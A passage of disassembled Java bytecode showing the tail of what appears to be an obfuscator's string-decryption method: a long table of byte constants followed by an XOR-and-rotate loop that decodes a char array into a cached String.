      1184: goto          2471
      1187: bipush        98
      1189: goto          2471
      1192: sipush        233
      1195: goto          2471
      1198: sipush        164
      1201: goto          2471
      1204: sipush        176
      1207: goto          2471
      1210: sipush        193
      1213: goto          2471
      1216: sipush        200
      1219: goto          2471
      1222: sipush        237
      1225: goto          2471
      1228: bipush        94
      1230: goto          2471
      1233: bipush        24
      1235: goto          2471
      1238: sipush        205
      1241: goto          2471
      1244: bipush        122
      1246: goto          2471
      1249: sipush        204
      1252: goto          2471
      1255: bipush        92
      1257: goto          2471
      1260: sipush        251
      1263: goto          2471
      1266: bipush        84
      1268: goto          2471
      1271: bipush        115
      1273: goto          2471
      1276: bipush        27
      1278: goto          2471
      1281: sipush        236
      1284: goto          2471
      1287: sipush        166
      1290: goto          2471
      1293: bipush        11
      1295: goto          2471
      1298: sipush        168
      1301: goto          2471
      1304: sipush        238
      1307: goto          2471
      1310: sipush        146
      1313: goto          2471
      1316: sipush        187
      1319: goto          2471
      1322: sipush        214
      1325: goto          2471
      1328: bipush        107
      1330: goto          2471
      1333: sipush        202
      1336: goto          2471
      1339: bipush        41
      1341: goto          2471
      1344: bipush        110
      1346: goto          2471
      1349: bipush        109
      1351: goto          2471
      1354: sipush        179
      1357: goto          2471
      1360: bipush        55
      1362: goto          2471
      1365: sipush        130
      1368: goto          2471
      1371: sipush        160
      1374: goto          2471
      1377: bipush        83
      1379: goto          2471
      1382: bipush        108
      1384: goto          2471
      1387: sipush        244
      1390: goto          2471
      1393: sipush        170
      1396: goto          2471
      1399: bipush        73
      1401: goto          2471
      1404: bipush        74
      1406: goto          2471
      1409: bipush        100
      1411: goto          2471
      1414: sipush        213
      1417: goto          2471
      1420: sipush        165
      1423: goto          2471
      1426: sipush        188
      1429: goto          2471
      1432: sipush        217
      1435: goto          2471
      1438: bipush        105
      1440: goto          2471
      1443: bipush        75
      1445: goto          2471
      1448: sipush        131
      1451: goto          2471
      1454: bipush        38
      1456: goto          2471
      1459: bipush        28
      1461: goto          2471
      1464: bipush        82
      1466: goto          2471
      1469: sipush        147
      1472: goto          2471
      1475: sipush        148
      1478: goto          2471
      1481: sipush        229
      1484: goto          2471
      1487: sipush        241
      1490: goto          2471
      1493: bipush        42
      1495: goto          2471
      1498: bipush        63
      1500: goto          2471
      1503: sipush        190
      1506: goto          2471
      1509: bipush        70
      1511: goto          2471
      1514: bipush        26
      1516: goto          2471
      1519: sipush        156
      1522: goto          2471
      1525: sipush        226
      1528: goto          2471
      1531: bipush        32
      1533: goto          2471
      1536: bipush        58
      1538: goto          2471
      1541: bipush        52
      1543: goto          2471
      1546: sipush        132
      1549: goto          2471
      1552: bipush        53
      1554: goto          2471
      1557: sipush        186
      1560: goto          2471
      1563: sipush        182
      1566: goto          2471
      1569: bipush        125
      1571: goto          2471
      1574: bipush        47
      1576: goto          2471
      1579: sipush        198
      1582: goto          2471
      1585: bipush        79
      1587: goto          2471
      1590: bipush        102
      1592: goto          2471
      1595: bipush        40
      1597: goto          2471
      1600: bipush        37
      1602: goto          2471
      1605: sipush        158
      1608: goto          2471
      1611: sipush        231
      1614: goto          2471
      1617: bipush        21
      1619: goto          2471
      1622: sipush        199
      1625: goto          2471
      1628: bipush        17
      1630: goto          2471
      1633: iconst_2
      1634: goto          2471
      1637: sipush        218
      1640: goto          2471
      1643: bipush        91
      1645: goto          2471
      1648: sipush        141
      1651: goto          2471
      1654: bipush        49
      1656: goto          2471
      1659: sipush        234
      1662: goto          2471
      1665: sipush        174
      1668: goto          2471
      1671: sipush        129
      1674: goto          2471
      1677: sipush        201
      1680: goto          2471
      1683: sipush        207
      1686: goto          2471
      1689: bipush        114
      1691: goto          2471
      1694: bipush        16
      1696: goto          2471
      1699: bipush        106
      1701: goto          2471
      1704: bipush        7
      1706: goto          2471
      1709: sipush        135
      1712: goto          2471
      1715: bipush        80
      1717: goto          2471
      1720: bipush        104
      1722: goto          2471
      1725: sipush        159
      1728: goto          2471
      1731: sipush        155
      1734: goto          2471
      1737: iconst_3
      1738: goto          2471
      1741: sipush        134
      1744: goto          2471
      1747: bipush        50
      1749: goto          2471
      1752: sipush        161
      1755: goto          2471
      1758: bipush        14
      1760: goto          2471
      1763: sipush        243
      1766: goto          2471
      1769: sipush        180
      1772: goto          2471
      1775: bipush        25
      1777: goto          2471
      1780: sipush        203
      1783: goto          2471
      1786: bipush        119
      1788: goto          2471
      1791: sipush        151
      1794: goto          2471
      1797: sipush        197
      1800: goto          2471
      1803: bipush        78
      1805: goto          2471
      1808: bipush        81
      1810: goto          2471
      1813: sipush        185
      1816: goto          2471
      1819: bipush        67
      1821: goto          2471
      1824: sipush        250
      1827: goto          2471
      1830: sipush        192
      1833: goto          2471
      1836: bipush        35
      1838: goto          2471
      1841: iconst_4
      1842: goto          2471
      1845: bipush        97
      1847: goto          2471
      1850: sipush        219
      1853: goto          2471
      1856: sipush        145
      1859: goto          2471
      1862: bipush        99
      1864: goto          2471
      1867: sipush        211
      1870: goto          2471
      1873: bipush        72
      1875: goto          2471
      1878: sipush        149
      1881: goto          2471
      1884: bipush        123
      1886: goto          2471
      1889: bipush        71
      1891: goto          2471
      1894: sipush        208
      1897: goto          2471
      1900: sipush        210
      1903: goto          2471
      1906: bipush        111
      1908: goto          2471
      1911: bipush        18
      1913: goto          2471
      1916: sipush        128
      1919: goto          2471
      1922: bipush        121
      1924: goto          2471
      1927: sipush        230
      1930: goto          2471
      1933: bipush        39
      1935: goto          2471
      1938: bipush        60
      1940: goto          2471
      1943: bipush        126
      1945: goto          2471
      1948: bipush        56
      1950: goto          2471
      1953: iconst_1
      1954: goto          2471
      1957: sipush        143
      1960: goto          2471
      1963: bipush        12
      1965: goto          2471
      1968: iconst_0
      1969: goto          2471
      1972: bipush        36
      1974: goto          2471
      1977: bipush        57
      1979: goto          2471
      1982: sipush        239
      1985: goto          2471
      1988: bipush        22
      1990: goto          2471
      1993: bipush        95
      1995: goto          2471
      1998: bipush        86
      2000: goto          2471
      2003: bipush        30
      2005: goto          2471
      2008: bipush        46
      2010: goto          2471
      2013: sipush        183
      2016: goto          2471
      2019: sipush        235
      2022: goto          2471
      2025: bipush        120
      2027: goto          2471
      2030: sipush        248
      2033: goto          2471
      2036: sipush        152
      2039: goto          2471
      2042: bipush        13
      2044: goto          2471
      2047: sipush        212
      2050: goto          2471
      2053: bipush        113
      2055: goto          2471
      2058: bipush        20
      2060: goto          2471
      2063: bipush        61
      2065: goto          2471
      2068: sipush        189
      2071: goto          2471
      2074: sipush        220
      2077: goto          2471
      2080: sipush        252
      2083: goto          2471
      2086: sipush        228
      2089: goto          2471
      2092: bipush        51
      2094: goto          2471
      2097: bipush        48
      2099: goto          2471
      2102: bipush        10
      2104: goto          2471
      2107: bipush        116
      2109: goto          2471
      2112: bipush        33
      2114: goto          2471
      2117: sipush        163
      2120: goto          2471
      2123: bipush        54
      2125: goto          2471
      2128: bipush        23
      2130: goto          2471
      2133: bipush        65
      2135: goto          2471
      2138: bipush        124
      2140: goto          2471
      2143: bipush        90
      2145: goto          2471
      2148: sipush        240
      2151: goto          2471
      2154: bipush        68
      2156: goto          2471
      2159: bipush        8
      2161: goto          2471
      2164: bipush        93
      2166: goto          2471
      2169: bipush        118
      2171: goto          2471
      2174: bipush        87
      2176: goto          2471
      2179: sipush        167
      2182: goto          2471
      2185: sipush        184
      2188: goto          2471
      2191: sipush        232
      2194: goto          2471
      2197: bipush        96
      2199: goto          2471
      2202: bipush        112
      2204: goto          2471
      2207: sipush        253
      2210: goto          2471
      2213: bipush        89
      2215: goto          2471
      2218: bipush        117
      2220: goto          2471
      2223: bipush        59
      2225: goto          2471
      2228: sipush        138
      2231: goto          2471
      2234: bipush        19
      2236: goto          2471
      2239: sipush        215
      2242: goto          2471
      2245: bipush        127
      2247: goto          2471
      2250: sipush        154
      2253: goto          2471
      2256: bipush        101
      2258: goto          2471
      2261: sipush        247
      2264: goto          2471
      2267: sipush        133
      2270: goto          2471
      2273: sipush        206
      2276: goto          2471
      2279: bipush        15
      2281: goto          2471
      2284: bipush        69
      2286: goto          2471
      2289: bipush        88
      2291: goto          2471
      2294: bipush        43
      2296: goto          2471
      2299: sipush        245
      2302: goto          2471
      2305: bipush        31
      2307: goto          2471
      2310: sipush        136
      2313: goto          2471
      2316: sipush        224
      2319: goto          2471
      2322: sipush        153
      2325: goto          2471
      2328: sipush        172
      2331: goto          2471
      2334: sipush        171
      2337: goto          2471
      2340: sipush        178
      2343: goto          2471
      2346: sipush        169
      2349: goto          2471
      2352: sipush        255
      2355: goto          2471
      2358: sipush        144
      2361: goto          2471
      2364: sipush        137
      2367: goto          2471
      2370: bipush        77
      2372: goto          2471
      2375: sipush        227
      2378: goto          2471
      2381: sipush        191
      2384: goto          2471
      2387: sipush        196
      2390: goto          2471
      2393: sipush        162
      2396: goto          2471
      2399: sipush        246
      2402: goto          2471
      2405: sipush        173
      2408: goto          2471
      2411: bipush        45
      2413: goto          2471
      2416: sipush        140
      2419: goto          2471
      2422: sipush        181
      2425: goto          2471
      2428: bipush        44
      2430: goto          2471
      2433: sipush        175
      2436: goto          2471
      2439: sipush        223
      2442: goto          2471
      2445: sipush        242
      2448: goto          2471
      2451: bipush        103
      2453: goto          2471
      2456: sipush        222
      2459: goto          2471
      2462: sipush        150
      2465: goto          2471
      2468: sipush        254
      2471: istore        5
      2473: iload_1
      2474: iload_2
      2475: ixor
      2476: dup
      2477: istore_1
      2478: sipush        255
      2481: iand
      2482: iload         5
      2484: isub
      2485: istore        6
      2487: iload         6
      2489: ifge          2498
      2492: iinc_w        6, 256
      2498: iload_1
      2499: ldc           #11                 // int 65535
      2501: iand
      2502: bipush        8
      2504: iushr
      2505: iload         5
      2507: isub
      2508: istore        7
      2510: iload         7
      2512: ifge          2521
      2515: iinc_w        7, 256
      2521: iconst_0
      2522: istore        8
      2524: goto          2602
      2527: iload         8
      2529: iconst_2
      2530: irem
      2531: istore        9
      2533: aload         4
      2535: iload         8
      2537: dup2
      2538: caload
      2539: iload         9
      2541: ifne          2573
      2544: iload         6
      2546: ixor
      2547: i2c
      2548: castore
      2549: iload         6
      2551: iconst_3
      2552: iushr
      2553: iload         6
      2555: iconst_5
      2556: ishl
      2557: ior
      2558: aload         4
      2560: iload         8
      2562: caload
      2563: ixor
      2564: sipush        255
      2567: iand
      2568: istore        6
      2570: goto          2599
      2573: iload         7
      2575: ixor
      2576: i2c
      2577: castore
      2578: iload         7
      2580: iconst_3
      2581: iushr
      2582: iload         7
      2584: iconst_5
      2585: ishl
      2586: ior
      2587: aload         4
      2589: iload         8
      2591: caload
      2592: ixor
      2593: sipush        255
      2596: iand
      2597: istore        7
      2599: iinc          8, 1
      2602: iload         8
      2604: aload         4
      2606: arraylength
      2607: if_icmplt     2527
      2610: getstatic     #222                // Field b:[Ljava/lang/String;
      2613: iload_3
      2614: new           #317                // class java/lang/String
      2617: dup
      2618: aload         4
      2620: invokespecial #337                // Method java/lang/String."<init>":([C)V
      2623: invokevirtual #380                // Method java/lang/String.intern:()Ljava/lang/String;
      2626: aastore
      2627: getstatic     #222                // Field b:[Ljava/lang/String;
      2630: iload_3
      2631: aaload
      2632: areturn
}
